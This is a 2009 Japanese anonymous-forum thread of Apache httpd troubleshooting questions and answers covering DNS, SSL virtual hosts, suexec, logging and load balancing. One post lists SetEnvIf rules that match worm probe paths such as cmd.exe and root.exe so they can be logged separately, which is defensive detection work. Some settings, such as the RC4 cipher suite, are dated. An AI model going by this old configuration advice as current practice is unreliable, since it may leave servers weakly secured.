入門者向けの情報、日本語に訳されていない部分の補完などがあれば幸いです。
0148名無しさん@お腹いっぱい。
2009/03/06(金) 17:11:16訳されてない部分は原文を読めばいい。
どうせ訳されている部分も原文を読むことになるし。
0149名無しさん@お腹いっぱい。
2009/03/06(金) 17:18:39$ ping 192.168.1.10 # 問題なし
$ telnet 192.168.1.10 80 # 15秒ぐらいかかる
なにかヒントありましたらお願いします。
このファイルを見ろとかでも助かります。
OS: CentOS
0150名無しさん@お腹いっぱい。
2009/03/06(金) 17:20:430151名無しさん@お腹いっぱい。
2009/03/06(金) 17:44:11ありがとうございます。
訳されてようが訳されてまうが、結局原文を読むというのは
いつも、どんな場所でも変わりませんね。
0152名無しさん@お腹いっぱい。
2009/03/06(金) 17:50:44ありがとうございます。
たしかに nslookup 196.168.1.10 がタイムアウトでエラーになります。
これが原因なのでしょうか。
とりあえず /etc/hosts にホスト名を追記してみたんですが、症状は改善されませんでした。
/etc/hosts は逆引きには関係ないんでしたっけ?
0153名無しさん@お腹いっぱい。
2009/03/06(金) 18:18:54タイムアウトしている可能性があるという意味でしょ。
クライアント側のhosts書いてどうすんのよw
環境がよく分からんけど、すべてLAN内の話なの?
それから、本当にHTTPだけなの? 他のサービスは?
0154名無しさん@お腹いっぱい。
2009/03/06(金) 18:25:42/etc/hosts の書き方が間違ってただけでした。
正しく書き直したらちゃんと動くようになりました。
どうもありがとうございました。
0155名無しさん@お腹いっぱい。
2009/03/14(土) 00:07:35オライリーのApacheハンドブック
0156名無しさん@お腹いっぱい。
2009/03/14(土) 17:23:36あんまり使えなくて運用実績がない感じなのかな?
情報求む
0157名無しさん@お腹いっぱい。
2009/03/15(日) 07:31:11そういえば、クックブックってどう?
0158名無しさん@お腹いっぱい。
2009/04/12(日) 22:07:47worker.c(1354): taking over scoreboard slot from 17847 (quiescing)
worker.c(1030): child 8235 isn't taking over slots very quickly (24 of 25)
とか出るんだけど、何だろ。
0159名無しさん@お腹いっぱい。
2009/04/12(日) 23:07:35ってのが全然ない状態でgraceful再起動するとそうなる。
まあ気にすることはない
0160名無しさん@お腹いっぱい。
2009/04/12(日) 23:10:170162名無しさん@お腹いっぱい。
2009/04/16(木) 16:31:47IPアドレスを抜き取って接続拒否する手段をとるようですねえ?最低な管理人様ですね。
それとも私の勘違いかな、サーバーに不具合でもあるのでしょうか?特定の人間だけを接続不可能にするような不具合でも?それなら早く直して頂きたいものですね。
Apache 2 Test Pagepowered by CentOS
こんな表示画面に飛ばされるのですが???
まあきちんと削除して下さいな。利用規約にもきちんと明記があるわけですから禁止行為>・第三者の権利を侵害する可能性のあるファイルをアップロードすること。
むしろありがたいと思ってもらいたいですね、犯罪の片棒担ぐのを未然に防げるんですから。
[8] 名前:管理人★ :2009/04/15 (水) 03:35 No.346
>>7
削除完了
※ご自分のPC環境をお確かめ下さい。
ココはアクセスの仕方やパスの解き方などなど...を教えてあげる所ではありません。('A`)
これってさこっちの環境じゃないでしょ?
馬鹿な管理人がムカツイテ特定のIP拒否してるんだけだよね?
0163名無しさん@お腹いっぱい。
2009/04/16(木) 19:30:23日本g
0164名無しさん@お腹いっぱい。
2009/04/16(木) 20:21:56SSL環境でsuexec環境のcgiは実行可能でしょうか?
0165名無しさん@お腹いっぱい。
2009/04/16(木) 22:17:00はい。むしろダメな理由がない。
0166名無しさん@お腹いっぱい。
2009/04/19(日) 01:57:11遅くなりましたがお返事ありがとうございます。
下記のようにssl.confを設定したところユーザー権限で実行できたのですが
このユーザー以外の他のユーザー権限で実行することは不可能でしょうか?
<VirtualHost _default_:443>
SuexecUserGroup user group
</VirtualHost>
ご教授よろしくお願いします。
0167名無しさん@お腹いっぱい。
2009/04/19(日) 07:12:48<VirtualHost 192168.0.2:443>
SuexecUserGroup user group
</VirtualHost>
<VirtualHost 192168.0.3:443>
ServerName vhost2.example.net
SuexecUserGroup user2 group2
</VirtualHost>
こんな感じでVirtualHostを追加すればいいよ。
完璧に構築しようと思ったら、グローバルアドレス2個、SSL証明書2個を
用意して、それぞれに1個ずつ割り当てる必要がある。
ブラウザに警告が出ても良いなら、IPアドレスもSSL証明書も1個を
使いまわして、NameVirtualHostで構築することもできる。
要件次第だね。
0168名無しさん@お腹いっぱい。
2009/04/26(日) 20:11:28--2009-04-26 20:09:53-- https://localhost/
localhost をDNSに問いあわせています... 127.0.0.1, ::1
localhost|127.0.0.1|:443 に接続しています... 接続しました。
OpenSSL: error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
SSL による接続が確立できません。
って出るんですが、これは一体どういうエラーなんでしょうか。
ubuntu9.04
インストールしてsslを使えるようにした以外はまっさらな状態です。
0169名無しさん@お腹いっぱい。
2009/04/26(日) 20:27:16telnetでアクセスすると501エラーが出ました。
0170名無しさん@お腹いっぱい。
2009/04/26(日) 22:54:080171名無しさん@お腹いっぱい。
2009/04/27(月) 16:56:59Bad Request
Your browser sent a request that this server could not understand.
Reason: You're speaking plain HTTP to an SSL-enabled server port.
Instead use the HTTPS scheme to access this URL, please.
Hint: https://****.com/
というページが表示されるようになりました。
httpsではアクセスできるんですが、通常のhttpではアクセスできなくなりました。
0172名無しさん@お腹いっぱい。
2009/04/27(月) 17:57:260173名無しさん@お腹いっぱい。
2009/04/29(水) 12:53:33を使っていたのだが、varの容量設定が小さすぎて
ファイルがこれ以上増やせない
rootならかなり余裕があるんで
DocumentRoot /root/www/html
に変更して、service httpd restart
だとエラーで起動してくれない。どうしたらいいんだー?
再インスコメンドクセ
0174名無しさん@お腹いっぱい。
2009/04/29(水) 15:55:460175名無しさん@お腹いっぱい。
2009/04/29(水) 16:25:090176名無しさん@お腹いっぱい。
2009/04/29(水) 18:48:24環境やログを書かずにエスパーしろと?
0177名無しさん@お腹いっぱい。
2009/04/30(木) 01:16:530178名無しさん@お腹いっぱい。
2009/04/30(木) 09:18:010179名無しさん@お腹いっぱい。
2009/05/23(土) 01:48:57ログの書式を設定したいのですが
解決方法を教えていただけないでしょうか。
httpd.confで次の設定をしています。
・ログローテートについて
CustomLog "|/opt/apache/bin/rotatelogs /opt/apache/logs/access_log.%Y%m%d 86400" hoge
CustomLog "|/opt/apache/bin/rotatelogs /opt/apache/logs/error_log.%Y%m%d 86400" hoge
・ログの書式について
[日時] [ホスト名] [情報レベル] [詳細]
という風に設定したいです。
次の設定にしています。
LogFormat "%t %h %l %u %t \"%r\" %>s %b" hoge
その他の設定はほとんどデフォルトから変更しておりません。
OS : centos 4.6
Apache version: 2.2.11
以上です。よろしくお願いします。m(_ _)m
0180名無しさん@お腹いっぱい。
2009/05/23(土) 10:21:15生ログをExcelに落とし込んでマクロで成型してますが、もっとサクっとしたいです。
0181名無しさん@お腹いっぱい。
2009/05/23(土) 10:55:510182名無しさん@お腹いっぱい。
2009/05/24(日) 04:24:230183名無しさん@お腹いっぱい。
2009/05/24(日) 17:59:56金持ちだな。
0184名無しさん@お腹いっぱい。
2009/05/25(月) 08:06:47ttp://localhost/~username/
となりますが、
そもそも、フォルダ名に~を含めることって問題ないのでしょうか?
たとえば、userdirを使用せずに、
ttp://localhost/~username/
や
ttp://localhost/~ディレクトリ名/
を実現したい場合、
単純に localhost内に ~username や~ディレクトリ名 というディレクトリを置いて
利用することはapache的に問題ないことなのでしょうか?
それとも
「~はuserdir用でしょ!!」
みたいな感じでこの利用の仕方はサポートされてないのでしょうか?
0185名無しさん@お腹いっぱい。
2009/05/25(月) 13:26:43ただし、mod_userdir が生きてると邪魔するので確実にはずしておくこと。
0186名無しさん@お腹いっぱい。
2009/06/02(火) 23:33:40すべてSSLな携帯コンテンツの負荷分散を、
mod_proxy_balancerを使って構築したいと思ってるんですが、
stickeysessionを使ったセッション維持って可能なんでしょうか?
0187名無しさん@お腹いっぱい。
2009/06/03(水) 15:52:530188名無しさん@お腹いっぱい。
2009/07/07(火) 16:18:18今仕事でいやいやIISいじってるのだがほんとイライラする。
apacheならhttpd.confのちょっといじればいいだけなのに、とか
ログなんてgrepで探せばすぐ見つかるのに・・・とか
ほんとMicrosoftは人をイライラさせる天才なんじゃないかと思う。
0189名無しさん@お腹いっぱい。
2009/07/08(水) 03:09:430190名無しさん@お腹いっぱい。
2009/07/10(金) 13:14:32httpd.confに何か書き込まないといけないのでしょうか?
使用しているバージョンは2.0系です。
0191名無しさん@お腹いっぱい。
2009/07/10(金) 13:58:08ディレクティブの設定をすれば動きました。
0192名無しさん@お腹いっぱい。
2009/07/13(月) 18:04:22エラーログにこんな感じのことが書いてあると思いますが
どれが404や500などのエラーかわからないです。
どうやって見分ければいいのでしょうか?
0193名無しさん@お腹いっぱい。
2009/07/13(月) 18:18:580194名無しさん@お腹いっぱい。
2009/07/13(月) 18:26:260195名無しさん@お腹いっぱい。
2009/07/13(月) 19:18:29俺はむしろ 2000 が気になった。
0196名無しさん@お腹いっぱい。
2009/07/18(土) 15:03:58Options FollowSymLinks
AllowOverride None
<--- ここでログの設定
</Directory>
こんな感じの設定方法でログを一切記録しない方法ってある?
0197名無しさん@お腹いっぱい。
2009/07/19(日) 07:04:19<IfModule mod_throttle.c>
ThrottleClientIP 1 volume 1M 1200
</IfModule>
と書いて1MBを超える転送を試みたのですが503ページになってくれず
通常通りページを表示することができてしまいました
mod_throttle自体はインストールできていると思うのですが・・
何か確実に確認できる方法がありましたら教えてくださいよろしくお願いします。
0198名無しさん@お腹いっぱい。
2009/07/20(月) 07:48:51条件を多く指定してると、ちゃんとログが分けられず
拒否してる条件でもログを記録しちゃってるのはなぜ??
0199名無しさん@お腹いっぱい。
2009/07/20(月) 08:21:010200名無しさん@お腹いっぱい。
2009/07/20(月) 10:30:43ミスってはないと思うんだけど・・・
0201名無しさん@お腹いっぱい。
2009/07/20(月) 15:35:340202名無しさん@お腹いっぱい。
2009/07/25(土) 16:37:10SetEnvIf User-Agent "Googlebot" search no_log !html_log
SetEnvIf User-Agent "Googlebot-Image" search no_log !html_log
SetEnvIf User-Agent "Googlebot-Mobile" search no_log !html_log
## Yahoo
SetEnvIf User-Agent "Y!J" search no_log !html_log
# MSN
SetEnvIf User-Agent "msnbot" search no_log !html_log
(BOT User-Agent略)
# 拒否User-Agent
## Baidu.jp
SetEnvIf User-Agent "Baiduspider" no_log !html_log deny_agent
SetEnvIf User-Agent "BaiduImagespider" no_log !html_log deny_agent
SetEnvIf User-Agent "BaiduMobaider" no_log !html_log deny_agent
0203名無しさん@お腹いっぱい。
2009/07/25(土) 16:37:51SetEnvIf Request_URI "cmd\.exe" worm file_log no_log
SetEnvIf Request_URI "root\.exe" worm file_log no_log
SetEnvIf Request_URI "Admin\.dll" worm file_log no_log
SetEnvIf Request_URI "NULL\.IDA" worm file_log no_log
SetEnvIf Request_URI "^/_mem_bin/" worm file_log no_log
SetEnvIf Request_URI "^/_vti_bin/" worm file_log no_log
SetEnvIf Request_URI "^/c/" worm file_log no_log
SetEnvIf Request_URI "^/d/" worm file_log no_log
SetEnvIf Request_URI "^/msadc/" worm file_log no_log
SetEnvIf Request_URI "^/MSADC/" worm file_log no_log
SetEnvIf Request_URI "^/scripts/" worm file_log no_log
SetEnvIf Request_URI "^/server-status" file_log no_log
SetEnvIf Request_URI "robots\.txt" file_log no_log
SetEnvIf Request_URI "favorite.ico" file_log no_log
SetEnvIf Remote_Addr "^192\.168\." file_log no_log
SetEnvIf Remote_Addr "^127\.0\." file_log no_log
SetEnvIf Request_URI "\.(jpg)|(gif)|(png)|(ico)|(css)$" img file_log no_log
SetEnvIf Request_URI "\/(\.(html)|(htm)|(cgi)|(php)|)$" html_log file_log !no_log
CustomLog logs/access_log htmlformat env=!no_log
CustomLog logs/access_html_log htmlformat env=html_log <-- に、!html_logで記録したくないやつが記録されてる
CustomLog logs/access_img_log imgformat env=img
CustomLog logs/access_file_log imgformat env=!file_log
CustomLog logs/worm_log searchformat env=worm
CustomLog logs/search_log searchformat env=search
もうお手上げorz
0204名無しさん@お腹いっぱい。
2009/07/25(土) 20:46:27まあ、ログにとりたくないものってのはわかるけどさ
0205名無しさん@お腹いっぱい。
2009/07/26(日) 00:13:35うちのサイトはログ五つにわけてるけど・・・
>>203
の分け方は難しそう。
SetEnvIf Request_URI "\/(\.(html)|(htm)|(cgi)|(php)|)$" html_log file_log !no_log
の!no_logって未対応になったはずだと思うけど?
0206名無しさん@お腹いっぱい。
2009/07/26(日) 00:26:050207名無しさん@お腹いっぱい。
2009/07/26(日) 06:28:230208名無しさん@お腹いっぱい。
2009/07/26(日) 09:20:280209名無しさん@お腹いっぱい。
2009/07/27(月) 21:02:570210名無しさん@お腹いっぱい。
2009/08/07(金) 09:34:38ファイル名がSJISになっているところがあって、そこだけファイル名をSJISで
扱うようにはできないでしょうか?
0211名無しさん@お腹いっぱい。
2009/08/07(金) 12:49:49動かしているんですが、ユーザーが入力した日本語のエンコードされたURLの
http://…/a.cgi?phrase=%E3%83%88…
みたいなのの%E3%83%88…を日本語で表示してくれるものはありますか?
0212名無しさん@お腹いっぱい。
2009/08/07(金) 12:59:48プログラム書くしかないよ。
0213名無しさん@お腹いっぱい。
2009/08/07(金) 13:21:11http://tomikura.s2.xrea.com/download/encode.html
0215名無しさん@お腹いっぱい。
2009/08/08(土) 19:40:21セッションの維持にPHP側での修正が必要な状況はまだ続いているのでしょうか?
セッションが維持できればstatus=+Hをはずして負荷分散したいのですが、なにか便利なモジュール出てますか?
0216名無しさん@お腹いっぱい。
2009/08/12(水) 21:58:09デフォルトのままだと色々都合が悪いと思って質問してみました。
0217名無しさん@お腹いっぱい。
2009/08/12(水) 22:07:01なんで都合が悪いと思ったの?
0218名無しさん@お腹いっぱい。
2009/08/13(木) 07:46:54自分で決めること。
0219名無しさん@お腹いっぱい。
2009/08/13(木) 07:58:210220名無しさん@お腹いっぱい。
2009/08/13(木) 08:33:150221名無しさん@お腹いっぱい。
2009/08/13(木) 08:43:01バックアップ取る時とか便利じゃん。
でも確かにみんなどうしてるのかは気になる。
0222名無しさん@お腹いっぱい。
2009/08/13(木) 10:41:080223名無しさん@お腹いっぱい。
2009/08/13(木) 22:05:16こまけーこたぁいーんだよ
0224名無しさん@お腹いっぱい。
2009/08/15(土) 17:13:520225名無しさん@お腹いっぱい。
2009/08/19(水) 18:32:50バックアップとしてもう1つWEBサーバを構築する必要があるのですが
apacheに関して設定を書いたリストがないことからどのようにしていいか迷ってます。
httpd -Vでバージョン等はわかるんですがconfigureでどの値を指定して入れたのかといった
情報を確かめる方法はありますか?
0226名無しさん@お腹いっぱい。
2009/08/19(水) 18:44:49簡単な方法はないと思う。
httpd -l とかからがんばってひねり出す。
0227名無しさん@お腹いっぱい。
2009/08/19(水) 18:47:55そこにconfig.niceとかいろいろ入っていてくれるときもある。
0228名無しさん@お腹いっぱい。
2009/08/19(水) 18:52:27ソースのディレクトリは消しちゃった?
0229名無しさん@お腹いっぱい。
2009/08/19(水) 18:54:38バイナリまるごとコピーしたらいいだけじゃないか。
0230名無しさん@お腹いっぱい。
2009/08/19(水) 18:58:070231225
2009/08/19(水) 19:41:51やってみたけど
Compiled in modules:
core.c
prefork.c
http_core.c
mod_so.c
って表示されて俺のレベルではハードルが高すぎました。
>>227
探してみましたが今回はそういった親切なフォルダやファイルはなさそうでした。
>>228
ソースのディレクトリは何故かきれいに掃除してありました・・・
>>229
サーバ止められないのでそのあたり少し難しいかもしれません
>>230
入れ直したいんですが止められないのでちょっと難しいです。
anaconda-ks.cfgのログに%packagesに@web-server自体がなかったので
OS構築後に入れたのはわかったんですが、初心者の私にはハードルが高そうですね。
0232名無しさん@お腹いっぱい。
2009/08/19(水) 20:10:36anacondaのログを確認とかヘンなことしてるが普通はrpmで有無を確認するだろ
パッケージで入れてるなら同じパッケージを入れて設定をコピーして修正
野良ビルドならhttpd.confから主要なファイルの配置先を把握して
それらのディレクトリやファイルを別マシンにコピーすればいい
以上が意味不明でお手上げと言うなら素直に出来ませんと伝えた方がいいね
0233名無しさん@お腹いっぱい。
2009/08/19(水) 20:29:11> サーバ止められないのでそのあたり少し難しいかもしれません
バイナリーまるごとコピーするのに、
なぜサーバーを止める必要があると思い込んでるの?
0234225
2009/08/19(水) 20:41:55既にrpmは確認してあります。httpd.confについてはファイルの配置先はいま確認してますので
そちらからさかのぼっていけば多分だいたいはわかると思います。
言われていることは初歩的なことなので初心者の私でも理解は出来ております。
的確なアドバイスありがとうございます。
>>231
すいません。HDDまるごとごっそりと勘違いしてると思います。
主要な部分だけなら別に止める必要はないですね。
0235名無しさん@お腹いっぱい。
2009/08/19(水) 20:52:03元がrpmなら、同じrpmを別マシンに入れればいいだけ。
あえてconfigureのオプションを確認したいなら、
そのrpmに対して rpm -qi で表示されるソースのrpmを入手して、
その中の SPECファイルに configureにオプションを付けたコマンド行が書いてある。
0236名無しさん@お腹いっぱい。
2009/08/21(金) 10:44:53Apache2.2を使ってます。
UTF-8で¥(円マーク)が/になってしまうのですが
httpd.confで何を設定したらいいでしょうか?
0237名無しさん@お腹いっぱい。
2009/08/21(金) 10:51:550238名無しさん@お腹いっぱい。
2009/08/21(金) 11:00:490239名無しさん@お腹いっぱい。
2009/08/21(金) 11:52:540240名無しさん@お腹いっぱい。
2009/08/21(金) 12:06:310241名無しさん@お腹いっぱい。
2009/08/21(金) 12:45:190242名無しさん@お腹いっぱい。
2009/08/21(金) 12:52:350243名無しさん@お腹いっぱい。
2009/08/21(金) 19:15:24マジレスすっと、それApacheとかhttpd.confとか無関係、板違いの話題。
SJISであれUTF-8であれ、\x5Cのバイナリ的には同じ。
ただブラウザで選択される言語のフォントで文字の割り当てが違うだけ。
>>241,242の言うとおりにするか、
詳しくは、Web系の板行くなり、HTML/CSS関係、実体参照あたりでググってくれ。
0244名無しさん@お腹いっぱい。
2009/08/21(金) 19:20:44UTF-8なら、¥と\(ともに半角)のコードは違う。
0245名無しさん@お腹いっぱい。
2009/08/21(金) 19:42:070246名無しさん@お腹いっぱい。
2009/08/21(金) 22:53:520247名無しさん@お腹いっぱい。
2009/08/21(金) 23:29:170248名無しさん@お腹いっぱい。
2009/08/22(土) 00:51:17http://pc12.2ch.net/test/read.cgi/unix/1023264974/814
0249名無しさん@お腹いっぱい。
2009/08/22(土) 15:55:56ダウト
5年ぶりくらいに見た
0250名無しさん@お腹いっぱい。
2009/08/22(土) 15:59:41ダウト
だから、1ヵ月ぶりだって(>>248)
0251名無しさん@お腹いっぱい。
2009/08/22(土) 16:15:250252名無しさん@お腹いっぱい。
2009/08/22(土) 17:57:37ダウト
同じ人
0253名無しさん@お腹いっぱい。
2009/08/22(土) 18:45:380254名無しさん@お腹いっぱい。
2009/08/22(土) 18:58:55同じ人と考えるのは無理があり過ぎるなぁ
0255名無しさん@お腹いっぱい。
2009/08/23(日) 15:25:060256名無しさん@お腹いっぱい。
2009/08/23(日) 20:52:350257名無しさん@お腹いっぱい。
2009/08/25(火) 11:23:48死語に近いしww
0258名無しさん@お腹いっぱい。
2009/08/27(木) 01:56:520259名無しさん@お腹いっぱい。
2009/08/27(木) 12:52:430260名無しさん@お腹いっぱい。
2009/08/27(木) 13:33:050261名無しさん@お腹いっぱい。
2009/08/27(木) 20:01:340262名無しさん@お腹いっぱい。
2009/08/27(木) 20:03:130263名無しさん@お腹いっぱい。
2009/08/27(木) 20:54:450264名無しさん@お腹いっぱい。
2009/08/27(木) 21:07:460265名無しさん@お腹いっぱい。
2009/08/29(土) 02:59:26http://www.f-secure.com/weblog/archives/00001757.html
0267名無しさん@お腹いっぱい。
2009/08/29(土) 07:39:590268名無しさん@お腹いっぱい。
2009/08/29(土) 07:45:48dev 機で作業してチェックしてから production 機に移すとか
やらんで、prod 機の html をいきなりemacs で編集、なんて
結構やるが、apache site もまさかその類なんじゃろか。
0269名無しさん@お腹いっぱい。
2009/08/29(土) 07:48:30*) ServerTokens now accepts 'Off' which disables sending of
Server: header and sets SERVER_SOFTWARE to empty. It also accepts
'Set' which allows the user to specify any string as the Server:
name. [Jim Jagielski]
0270名無しさん@お腹いっぱい。
2009/08/29(土) 07:49:44あるサーバー上のデータをrsyncかなんかで定期的に同期してる
0271名無しさん@お腹いっぱい。
2009/08/29(土) 08:08:16キタコレ
これでわざわざいじる必要なくなるか
0272名無しさん@お腹いっぱい。
2009/08/29(土) 09:47:01SecServerSignature をセットしないでも良くなった、てことかい?
0273名無しさん@お腹いっぱい。
2009/09/04(金) 02:15:15いろんなブログのsuPHPのインストール記録みると、たいていの人がsuExecも一緒に入れてるんだけど、ありゃなんでだ??
AddHandler x-suphp-cgi .cgi .pl
suPHP_AddHandler x-suphp-cgi
すればsuPHPだけでPHPもPerlもユーザ権限で走るのに、わざわざsuExec入れる意味がわからないんだけど
それともぼくの認識がおかしい?
0274名無しさん@お腹いっぱい。
2009/09/04(金) 08:05:30マニュアルも読まないし、自分で考えもしない人が世の中にはいっぱいいるから
間違ったやり方が正しいやり方を駆逐する
他の例:http://ya.maya.st/web/RTFM.html
0275名無しさん@お腹いっぱい。
2009/10/10(土) 09:05:08所有者 apache グループ apache
って、どう違うの?
ブラウザから見るグループウェア使ってるんだけど
アップデートが出ていたのでアップデートを適用して確認のため
ログオンしようとしたらグループウェアをインストールしてるフォルダに権限がないから
入れないよっていう警告が出て入れなかった
仕方ないのでインストールフォルダの権限とかみてたら他はほとんど
所有者 httpd グループ httpdばかりなのにエラーが出てたフォルダは所有者 apache グループ apacheってのに
なってたから試しに所有者 httpd グループ httpdにかえたら入れるようになった
んでもはいれた後も、ブラウザからログオンして使ってると所有権云々のエラーみたいなのが多発する
所有者 httpd グループ httpdでないと駄目なフォルダに所有者 apache グループ apacheとかなっちゃってるのは
何でなんだろう?
Apacheの設定?
0276名無しさん@お腹いっぱい。
2009/10/10(土) 12:19:47apacheをどのようなユーザ/グループで動かすかは、あくまで利用者が決める範疇。
ただ、バイナリパッケージを配布しているようなディストリビューションでは、
ディストリビューションのレベルでユーザ/グループを決めている。
ただし、それはどの環境でも同じとは限らない。
そのグループウェア、設定項目に、どのユーザ/グループで動かすかの指定があるんじゃないか?
デフォルトがapache/apacheになってるだけで。
0277名無しさん@お腹いっぱい。
2009/10/10(土) 18:45:45Windows環境で、USBフラッシュメモリにApache, Perl, PHP, MySQL(SQLight)の入ったPortable Server環境の構築を考えてます。
Portable Server環境で利用するスクリプト(ソフト)はNamazuとMediwWikiを考えています。
調べたところUSBメモリが使えるPortable ServerとしてはXAMPP, EasyPHP, Server2Goなど色々ありますが一長一短のような気がします。
お勧めのPortable Serverがあったら教えてください。
0278名無しさん@お腹いっぱい。
2009/10/10(土) 18:59:110279名無しさん@お腹いっぱい。
2009/10/10(土) 19:04:58きえてくだしあ
0280名無しさん@お腹いっぱい。
2009/10/10(土) 19:18:15スレタイに誘導されて思わず書きこんじまったよ。
0281名無しさん@お腹いっぱい。
2009/10/11(日) 01:46:090282名無しさん@お腹いっぱい。
2009/10/11(日) 09:37:460283名無しさん@お腹いっぱい。
2009/10/11(日) 09:58:31それ、なんかうまくいかないんですよね。
もうちょっとがんばってみます。
0284名無しさん@お腹いっぱい。
2009/10/11(日) 15:23:43example.comではcgiを、svn.example.comではsubversionサーバを動かそうとしています。
IPが1つなので、ワイルドカードsslを使おうとしました。
ssl.confの<VirtualHost _default_:443>以下をコメントアウトし、vhost_ssl.confとかを作ってこう書きました。
# svn用
NameVirtualHost *:443
LoadModule dav_svn_module modules/mod_dav_svn.so
LoadModule authz_svn_module modules/mod_authz_svn.so
<VirtualHost *:443>
ServerAdmin hoge@example.com
ServerName svn.example.com
SSLEngine on
SSLCipherSuite ALL:!ADH:!EXPORT:!SSLv2:RC4+RSA:+HIGH:+MEDIUM:+LOW
SSLCertificateFile /path/to/ssl.crt
SSLCertificateKeyFile /path/to/ssl.key
<Files ~ "\.(cgi|shtml|phtml|php3?)$">
SSLOptions +StdEnvVars
</Files>
<Location />
DAV svn
SSLRequireSSL
SVNParentPath /path/to/svn_repo
SVNListParentPath on
SVNAutoversioning on
AuthType Digest
AuthName "example"
AuthUserFile /path/to/digest_file
Require valid-user
</Location>
</VirtualHost>
0285284の続き
2009/10/11(日) 15:25:12Alias /my_cgi/ "/path/to/cgi/"
<VirtualHost *:443>
ServerName example.com
<Directory /path/to/cgi/>
DirectoryIndex example.pl
Options ExecCGI
AuthType Digest
AuthName "example"
AuthDigestDomain /example/
AuthUserFile /path/to/digest_file
Require valid-user
</Directory>
</VirtualHost>
これで https://svn.example.com/ でsubversionサーバが、 https://example.com/my_cgi/ でcgiが動くのですが、
cgiはhttpでもアクセス出来てしまい、http://svn.example.com/ にアクセスすると、example.netの方のコンテンツが表示されてしまいます。
何処を直せばいいかアドバイスをお願いします。
0286名無しさん@お腹いっぱい。
2009/10/11(日) 15:35:0680番のバーチャルホストも設定しなきゃダメ
NameVirtualHost *:443
NameVirtualHost *:80
<VirtualHost *:443>
ServerName svn.example.com
</VirtualHost>
<VirtualHost *:443>
ServerName example.com
</VirtualHost>
<VirtualHost *:443>
ServerName svn.example.com
</VirtualHost>
<VirtualHost *:80>
ServerName example.com
</VirtualHost>
<VirtualHost *:80>
ServerName example.net
</VirtualHost>
全部説明するのは面倒だから自分で考えてくれ
イメージは
(1)IP・ポートベースバーチャルホストと、名前ベースバーチャルホストは混在可能
(2)NameVirtualHostディレクティブで指定したIP・ポート(今回は*:80、*:443)に名前ベースバーチャルホストを作成する
0287名無しさん@お腹いっぱい。
2009/10/11(日) 15:37:34<VirtualHost *:80>
ServerName svn.example.com
</VirtualHost>
0288名無しさん@お腹いっぱい。
2009/10/11(日) 15:49:030289名無しさん@お腹いっぱい。
2009/10/12(月) 10:12:390291名無しさん@お腹いっぱい。
2009/10/12(月) 20:30:480292名無しさん@お腹いっぱい。
2009/10/13(火) 16:22:04http://ja.wikipedia.org/wiki/%E3%83%96%E3%83%AD%E3%82%B0#.E3.82.B5.E3.83.BC.E3.83.90.E3.82.BD.E3.83.95.E3.83.88.E3.82.A6.E3.82.A7.E3.82.A2
0293名無しさん@お腹いっぱい。
2009/10/18(日) 22:42:390294名無しさん@お腹いっぱい。
2009/10/19(月) 00:40:54https://issues.apache.org/bugzilla/show_bug.cgi?id=26052
0295名無しさん@お腹いっぱい。
2009/10/19(月) 00:42:10俺は止めないけど、とりあえずBugzillaの議論を見てからでも遅くないと思う
ちなみに俺は英語苦手だから26052の議論を追う気はない
0296名無しさん@お腹いっぱい。
2009/10/21(水) 00:02:03ありがとうございます。
まさにそのBugzillaに欲しかったエクスキューズがありました。
感謝します。
0297名無しさん@お腹いっぱい。
2009/10/27(火) 22:20:03could not read symbols だ、といって怒られた。例の、/usr/lib 対 /usr/lib64 の問題だろ、
と思って、かるく ./configure --enable-lib64 とか --with-expat=builtin とか、
LDFLAGS="-L/usr/lib64" とか、そういうので回避できるかと思ったら、どれもダメで、
予想以上に手こずった。
結局、build/config_vars.mkのなかの EXTRA_LDFLAGSの定義を
EXTRA_LDFLAGS = -L/usr/lib64 -L/usr/kerberos/lib と手で
直してとりあえず解決したが。
現象自体は既出だけど、よくある解決法が効かなかったところが不審。
RHEL/CentOS 5.4 の 64bit機で似たような目に遭った香具師いませんか?
0298名無しさん@お腹いっぱい。
2009/10/28(水) 02:38:52CentOS 5.4 (x86_64) で、普通に build 出来てる。
gcc4.4でもicc11.1でもできてる。
0299名無しさん@お腹いっぱい。
2009/11/02(月) 02:29:05[ aaa.comのdocroot ]
/aaa.com/public_html
[ bbb.comのdocroot]
/aaa.com/public_html/bbb.com/public_html
こういった環境のバーチャルホストを作成したとき、aaa.comのhtaccessの設定て
サブディレクトリにも継承されますか?
0300名無しさん@お腹いっぱい。
2009/11/02(月) 15:50:41現在apacheは起動していますが、
何らかで再起動の必要が生じるまでになんとかせねば…。
非常に焦っています。
現在読み込まれているhttpd.confの内容を把握する方法はありませんか?
0301名無しさん@お腹いっぱい。
2009/11/02(月) 21:17:16有効じゃなかったら…俺には思い浮かばないな
0302名無しさん@お腹いっぱい。
2009/11/04(水) 02:20:56当事者じゃないが、たしかにそれ使えるな。
Thx!
0303名無しさん@お腹いっぱい。
2009/11/04(水) 10:53:50それなら、諦めて次善策考えた方が良い。
0304名無しさん@お腹いっぱい。
2009/11/05(木) 00:57:47Tomcatでエラー発生時に、Tomcat側で設定しているエラーページを
表示したいのですが、Apacheのデフォルトのエラードキュメントが表示されてしまいます。
(「Additionally, a xxx error was encountered
while trying to use an ErrorDocument to handle the request」というやつ)
・ErrorDocumentディレクティブは設定していない
・Tomcatからはエラーページが返っている(mod_jk.logのダンプで確認)
・しかし上の直後に"No body with status=xxx for worker=workerx"と出力されている
→エラーページがbodyとして返ってきているのに何故???
・Tomcatのエラーページの拡張子を.varにするとちゃんとTomcat側のエラーページが表示できる
何故こうなるのか思い当たる点がある方、いらっしゃいませんでしょうか。
0305名無しさん@お腹いっぱい。
2009/11/07(土) 19:22:49lsofでinode追ってなかったことにするとか
ttp://www.itmedia.co.jp/enterprise/articles/0611/30/news007.html
0306名無しさん@お腹いっぱい。
2009/11/07(土) 23:41:45俺はFreeBSDだけどprocファイルシステム有効にしよっかな
0307名無しさん@お腹いっぱい。
2009/11/08(日) 07:54:22FreeBSDのprocでは >>305 のようなことはできません。
0308名無しさん@お腹いっぱい。
2009/11/08(日) 11:04:330309名無しさん@お腹いっぱい。
2009/11/09(月) 03:20:370310名無しさん@お腹いっぱい。
2009/11/14(土) 00:27:40どこが悪いんでしょうか?
<Location />
Order Allow,Deny
Allow from all
Deny from 1.1.1.1
</Location>
<Files robots.txt>
Order Deny,Allow
Allow from all
</Files>
0311名無しさん@お腹いっぱい。
2009/11/14(土) 00:32:09http://httpd.apache.org/docs/2.2/sections.html#mergin
0312名無しさん@お腹いっぱい。
2009/11/14(土) 00:34:590313名無しさん@お腹いっぱい。
